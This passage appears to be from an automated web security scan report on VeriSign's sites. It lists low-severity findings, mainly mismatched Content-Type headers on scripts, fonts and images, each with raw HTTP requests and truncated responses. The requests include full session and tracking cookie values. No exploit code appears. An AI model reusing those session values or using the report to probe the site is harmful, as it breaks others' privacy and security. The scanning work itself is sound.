   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 4102
Content-Type: text/html


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

22.61. https://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Request

GET / HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:30:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 34637

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.custom.js

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 985
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 4102
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

23. Content type incorrectly stated
There are 64 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content, and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ak.c.ooyala.com
Path:   /w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7 HTTP/1.1
Host: ak.c.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
x-amz-id-2: 2C0Xja9JcWvdZkdFgY46HvgLzrDh3/uV5ZIHpKbfgaV7B82NKulzZhMLCgKLiUEC
x-amz-request-id: 2C289606F85CA6E8
Last-Modified: Wed, 24 Mar 2010 20:46:05 GMT
ETag: "e296438fa374f5ed59656563980763eb"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 285
Server: AmazonS3
Cache-Control: max-age=604800
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close

x...=O.0.....[\.s.. ;U..    .e....m.qZ.(...&B ....{w.=.pf..K...)....b@\.._......n..83.m..?X......[......-..n....L.w>..|R.u9}......2......k.#9Z....,p..]..b.B~J.. ...`.....+.$....)..M^6.Ht....L/.D~    ....o..
...[SNIP]...

23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /assets/fonts/samd____-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/samd____-webfont.woff HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "2ef819b-7544-4a59eedb01b80"
Accept-Ranges: bytes
Content-Type: text/html
Age: 3152
Date: Fri, 09 Sep 2011 21:27:10 GMT
Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT
Expires: Sun, 09 Oct 2011 13:52:54 GMT
Content-Length: 30020
Connection: keep-alive

wOFF......uD................................FFTM............\...GDEF........... ....GPOS..........7&[0{.GSUB.......,...0....OS/2.......R...`x..fcmap...D...r....y0..cvt .......2...2
o..fpgm...........e
...[SNIP]...

23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "29304a9-3c47-49d8465fa77c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Age: 27502
Date: Fri, 09 Sep 2011 21:25:05 GMT
Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 15431
Connection: keep-alive

GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f....
...[SNIP]...

23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "29304aa-381d-49d8465fa77c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Age: 27502
Date: Fri, 09 Sep 2011 21:25:05 GMT
Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 14365
Connection: keep-alive

GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw
...[SNIP]...

23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /authweb/en_ch/assets/shared/js/google-analytics.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 27500
Date: Fri, 09 Sep 2011 21:25:03 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 460
Connection: keep-alive

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.ch']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scri
...[SNIP]...

23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 73854
Date: Fri, 09 Sep 2011 21:25:44 GMT
Expires: Sun, 09 Oct 2011 18:24:34 GMT
Content-Length: 1356
Connection: keep-alive

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/shared.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 69510
Date: Fri, 09 Sep 2011 21:24:45 GMT
Expires: Sun, 09 Oct 2011 05:58:30 GMT
Content-Length: 37327
Connection: keep-alive

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.verisign.com
Path:   /stellent/groups/public/documents/image/dev041741.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "690418-c9f-49a38f3161780"
Accept-Ranges: bytes
Content-Type: image/jpeg
Date: Fri, 09 Sep 2011 21:28:14 GMT
Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT
Expires: Sun, 09 Oct 2011 19:44:53 GMT
Content-Length: 3231
Connection: keep-alive

GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{.
...[SNIP]...

23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/en_us/assets/shared/js/google-analytics.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69191
Expires: Sun, 09 Oct 2011 02:25:41 GMT
Content-Length: 461

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scr
...[SNIP]...

23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/flyouts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 8048


//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
   //document.get
...[SNIP]...

23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/header.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 1558


/*******************************************
**             Header functions             **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/jquery.autocomplete.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 14
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 J..rn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/home/js/home.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/home/js/home.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 16
Expires: Sun, 09 Oct 2011 21:38:32 GMT
Content-Length: 2725

/*******************************************
**         HP specific functions         **
*******************************************/


//External link functionality
$('a[rel="external"]').click(funct
...[SNIP]...

23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/global-preload.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69230
Expires: Sun, 09 Oct 2011 02:24:38 GMT
Content-Length: 135518


// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js
/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the M
...[SNIP]...

23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/google-analytics.js

Issue detail

The response contains the following Content-type statement:

